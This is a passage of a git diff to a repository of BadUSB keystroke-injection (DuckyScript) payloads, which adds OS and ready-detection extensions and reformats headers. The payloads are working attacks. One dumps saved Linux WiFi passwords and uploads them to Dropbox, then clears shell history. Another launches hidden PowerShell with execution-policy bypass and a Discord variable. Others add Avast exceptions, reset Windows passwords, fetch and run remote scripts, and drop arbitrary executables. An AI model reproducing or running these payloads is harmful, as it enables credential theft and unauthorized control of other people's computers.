Merge 0f1e1af17c
into f3053273a4
commit
a0ebf8224c
|
@ -1,27 +1,53 @@
|
|||
|
||||
REM #######################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Wifi Passwords - Linux |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration, Credentials, Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM #######################################################
|
||||
REM_BLOCK
|
||||
#######################################################
|
||||
# #
|
||||
# Title : Exfiltrate Wifi Passwords - Linux #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration, Credentials, Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
#######################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
REM - Internet connection
|
||||
REM - Dropbox Token
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PREREQUISITES SECTION ####
|
||||
|
||||
|
||||
REM Required: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
STRING sudo su
|
||||
|
@ -41,8 +67,6 @@ ENTER
|
|||
|
||||
|
||||
REM #### ZIP SECTION ####
|
||||
|
||||
|
||||
DELAY 500
|
||||
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||
ENTER
|
||||
|
@ -61,8 +85,6 @@ ENTER
|
|||
|
||||
|
||||
REM #### WiFi && ZIP SECTION ####
|
||||
|
||||
|
||||
REM Get all WiFi data
|
||||
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
|
||||
ENTER
|
||||
|
@ -85,8 +107,6 @@ DELAY 3000
|
|||
|
||||
|
||||
REM #### EXFILTRATE SECTION ####
|
||||
|
||||
|
||||
REM Set yout Dropbox folder name
|
||||
DEFINE DROPBOX_FOLDER_NAME example
|
||||
STRING DROPBOX_FOLDER="/
|
||||
|
@ -105,8 +125,6 @@ ENTER
|
|||
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
DELAY 2000
|
||||
STRING history -c
|
||||
ENTER
|
||||
|
|
|
@ -10,8 +10,49 @@ REM # |
|
|||
REM ###################################################################
|
||||
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 250
|
||||
STRING powershell -w h -ep bypass $discord='
|
||||
|
|
|
@ -1,24 +1,65 @@
|
|||
REM ########################################################
|
||||
REM # |
|
||||
REM # Title : Add An Exception To Avast Antivirus |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ########################################################
|
||||
|
||||
REM_BLOCK
|
||||
########################################################
|
||||
# #
|
||||
# Title : Add An Exception To Avast Antivirus #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
########################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Avast installed and configured
|
||||
|
||||
|
||||
REM Set the full-path that you want to set as exception
|
||||
DEFINE FULL-PATH example/to/path
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Open Avast application
|
||||
DELAY 2000
|
||||
GUI
|
||||
DELAY 1000
|
||||
STRING avast
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
REM ##############################################
|
||||
REM # |
|
||||
REM # Title : Call Someone On An iPhone |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : iPhone |
|
||||
REM # |
|
||||
REM ##############################################
|
||||
|
||||
REM_BLOCK
|
||||
##############################################
|
||||
# |
|
||||
# Title : Call Someone On An iPhone |
|
||||
# Author : Aleff |
|
||||
# Version : 1.0 |
|
||||
# Category : Execution |
|
||||
# Target : iPhone |
|
||||
# |
|
||||
##############################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - The phone must be unlocked
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ###########################################
|
||||
REM # |
|
||||
REM # Title : Change Remote Git Link |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11/Linux |
|
||||
REM # |
|
||||
REM ###########################################
|
||||
REM_BLOCK
|
||||
###########################################
|
||||
# #
|
||||
# Title : Change Remote Git Link #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10-11/Linux #
|
||||
# #
|
||||
###########################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
|
|
|
@ -1,25 +1,50 @@
|
|||
|
||||
REM ###########################################
|
||||
REM # |
|
||||
REM # Title : Change Linux MAC Address |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ###########################################
|
||||
REM_BLOCK
|
||||
###########################################
|
||||
# #
|
||||
# Title : Change Linux MAC Address #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
###########################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
REM You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
|
||||
|
|
|
@ -1,25 +1,49 @@
|
|||
|
||||
REM ###############################################
|
||||
REM # |
|
||||
REM # Title : Change Network Configuration |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ###############################################
|
||||
REM_BLOCK
|
||||
###############################################
|
||||
# #
|
||||
# Title : Change Network Configuration #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
###############################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
REM Required: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
STRING sudo su
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM #############################################
|
||||
REM # |
|
||||
REM # Title : Change Windows User Name |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM #############################################
|
||||
REM_BLOCK
|
||||
#############################################
|
||||
# #
|
||||
# Title : Change Windows User Name #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#############################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing
|
||||
|
@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng
|
|||
REM Set the new name that you want to set
|
||||
DEFINE NEW_NAME example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Open Windows research
|
||||
DELAY 2000
|
||||
GUI
|
||||
DELAY 1000
|
||||
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ############################################################
|
||||
REM # |
|
||||
REM # Title : Change the password of the Windows user |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ############################################################
|
||||
REM_BLOCK
|
||||
############################################################
|
||||
# #
|
||||
# Title : Change the password of the Windows user #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
############################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing (i know it's absurd)
|
||||
|
@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd)
|
|||
REM You must define the new Windows user password
|
||||
DEFINE NEW_PASSWORD example
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI x
|
||||
DELAY 500
|
||||
STRING a
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Close All Applications - BADUSB ✅
|
||||
# Close All Applications
|
||||
|
||||
A script used to close all target open applications.
|
||||
|
||||
|
|
|
@ -1,27 +1,69 @@
|
|||
REM #####################################################
|
||||
REM # |
|
||||
REM # Title : Close All Applications |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM #####################################################
|
||||
REM_BLOCK
|
||||
#####################################################
|
||||
# #
|
||||
# Title : Close All Applications #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
#####################################################
|
||||
END_REM
|
||||
|
||||
REM Plug-And-Play
|
||||
|
||||
REM
|
||||
REM 1. Open a powershell
|
||||
REM 2. Download a Python script
|
||||
REM 3. Execute it
|
||||
REM 4. Remove Python script downloaded
|
||||
REM 5. Delete powershell history
|
||||
REM
|
||||
|
||||
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
|
||||
DEFINE POWERSHEL_CODE example.com
|
||||
|
||||
DELAY 2000
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI x
|
||||
DELAY 250
|
||||
DOWNARROW
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ############################################################
|
||||
REM # #
|
||||
REM # Title : Defend yourself against AtlasVPN Bug-Door #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : Execution #
|
||||
REM # Target : Linux #
|
||||
REM # #
|
||||
REM ############################################################
|
||||
REM_BLOCK
|
||||
############################################################
|
||||
# #
|
||||
# Title : Defend yourself against AtlasVPN Bug-Door #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
############################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Administrator Permission
|
||||
|
@ -15,7 +17,34 @@ REM - AtlasVPN installed
|
|||
REM Define the sudo user password
|
||||
DEFINE #SUDO-PWS example
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
|
|
@ -1,14 +1,14 @@
|
|||
|
||||
REM ################################################################
|
||||
REM # |
|
||||
REM # Title : Edit The Default Real App With An Arbitrary |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : GNU/Linux (Debian based tested) |
|
||||
REM # |
|
||||
REM ################################################################
|
||||
|
||||
REM_BLOCK
|
||||
################################################################
|
||||
# #
|
||||
# Title : Edit The Default Real App With An Arbitrary #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : GNU/Linux (Debian based tested) #
|
||||
# #
|
||||
################################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - sudo permissions
|
||||
|
@ -16,11 +16,9 @@ REM - Internet connection
|
|||
REM - Executable app
|
||||
REM - '.desktop' file
|
||||
|
||||
|
||||
REM Note:
|
||||
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
|
||||
|
||||
|
||||
REM Set the link from wich will be downloaded the zip archive
|
||||
DEFINE ARBITRARY_APP_LINK example
|
||||
|
||||
|
@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example
|
|||
REM sudo permissions needed
|
||||
DEFINE SUDO example
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
REM Open a shell
|
||||
DELAY 2000
|
||||
CTRL-ALT t
|
||||
DELAY 1000
|
||||
|
||||
|
|
|
@ -1,25 +1,50 @@
|
|||
|
||||
REM ################################################
|
||||
REM # |
|
||||
REM # Title : Exploiting An Executable File |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ################################################
|
||||
REM_BLOCK
|
||||
################################################
|
||||
# #
|
||||
# Title : Exploiting An Executable File #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing, it is Plug-And-Play but you can change it as you want.
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### Script ####
|
||||
|
||||
|
||||
STRINGLN
|
||||
function search_file {
|
||||
for file in "$1"/*; do
|
||||
|
|
|
@ -108,17 +108,11 @@ Happy Hacking!
|
|||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Instagram
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Discord
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
|
|
@ -1,27 +1,67 @@
|
|||
REM ###########################################################################################
|
||||
REM # |
|
||||
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ###########################################################################################
|
||||
|
||||
REM_BLOCK
|
||||
###########################################################################################
|
||||
# #
|
||||
# Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
###########################################################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing
|
||||
|
||||
|
||||
REM Define here your hexadecimal code
|
||||
DEFINE #HEX_CODE example
|
||||
|
||||
|
||||
REM Note:
|
||||
REM - Tested on Windows 11
|
||||
REM - Running checked but not blocked by Avast antivirus
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
